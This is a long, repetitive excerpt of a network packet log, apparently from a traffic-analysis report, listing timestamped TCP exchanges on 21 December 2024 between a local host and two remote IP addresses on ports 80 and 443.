                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.163851023 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.164869070 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.165020943 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.165062904 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.166512966 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.166543961 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.166573048 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.166610956 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.167413950 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.167510986 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.167557001 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.168450117 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.168575048 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.168621063 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.169625044 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.169667006 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.169796944 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.169838905 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.170869112 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.170919895 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.170974970 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.171010017 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.172072887 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.172115088 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.172146082 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.172189951 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.173197031 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.173295975 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.173338890 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.174431086 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.174475908 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.174526930 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.174568892 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.175626040 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.175673962 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.175796986 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.175839901 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.176769018 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.176928997 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.176974058 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.177936077 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.177982092 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.178039074 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.178082943 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.179193020 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.179246902 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.179277897 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.179326057 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.180367947 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.180514097 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.180561066 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.181600094 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.181646109 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.181675911 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.181719065 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.182698011 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.182749033 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.182812929 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.182857037 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.183861971 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.183911085 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.183990955 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.184032917 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.185029984 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.185199976 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.185245991 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.186263084 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.186309099 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.186336994 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.186378002 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.187490940 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.187560081 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.187612057 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.187652111 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.188596010 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.188772917 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.188821077 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.189857960 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.189901114 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.189944029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.189996004 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.191014051 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.191061020 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.191117048 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.191158056 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.192223072 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.192270041 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.192440987 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.193403959 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.193449020 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.193526983 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.193569899 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.194526911 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.194565058 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.194735050 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.194777012 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.195847988 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.195900917 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.195930004 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.195971966 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.197081089 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.197206020 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.197256088 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.198098898 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.198157072 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.300688028 CET44349799172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.300779104 CET49799443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.327914000 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.327970982 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.328068972 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.328248978 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.328300953 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.328337908 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.329416037 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.329483986 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.329505920 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.329552889 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.330581903 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.330631018 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.330678940 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.330719948 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.331418037 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.331463099 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.331562996 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.331600904 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.332647085 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.332762003 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.332809925 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.333827019 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.333873034 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.334086895 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.334136009 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.335005999 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.335056067 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.335172892 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.335216999 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.336194992 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.336247921 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.336508036 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.337369919 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.337420940 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.337470055 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.337513924 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.338552952 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.338604927 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.338681936 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.338726044 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.339942932 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.339998007 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.340028048 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.340068102 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.340941906 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.341061115 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.341103077 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.342154980 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.342195034 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.342267990 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.342308998 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.343302965 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.343347073 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.343455076 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.343494892 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.344528913 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.344671965 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.344721079 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.345683098 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.345820904 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.345856905 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.345874071 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.346906900 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.346951008 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.347024918 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.347063065 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.348078012 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.348130941 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.348210096 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.348256111 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.349294901 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.349390030 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.349447012 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.349623919 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.350514889 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.350558996 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.350617886 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.350661993 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.351742029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.351809978 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.351866961 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.351912022 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.352852106 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.352900028 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.352971077 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.353012085 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.354181051 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.354340076 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.354367971 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.354382038 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.355258942 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.355318069 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.355437040 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.355720043 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.356420040 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.356462955 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.356539011 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.356576920 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.357534885 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.357737064 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.357778072 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.358728886 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.358776093 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.358850956 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.358895063 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.359930038 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.359997988 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.360038996 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.360095978 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.361150026 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.361243963 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.361285925 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.362281084 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.362327099 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.362411022 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.362459898 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.363518000 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.363571882 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.363604069 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.363646030 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.364664078 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.364835024 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.364876032 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.365946054 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.365993023 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.366058111 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.366101027 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.367046118 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.367085934 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.367193937 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.367234945 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.368355989 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.368587017 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.368632078 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.369663954 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.369710922 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.369796038 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.369842052 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.371059895 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.371108055 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.371190071 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.371288061 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.372302055 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.372348070 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.372425079 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.373589039 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.373634100 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.373723984 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.373769045 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.374557018 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.374598026 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.374669075 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.374728918 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.375719070 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.375768900 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.375927925 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.375967979 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.376868963 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.376914024 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.376960039 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.377877951 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.377938986 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.377960920 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.378165007 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.378900051 CET804979731.41.244.11192.168.2.4
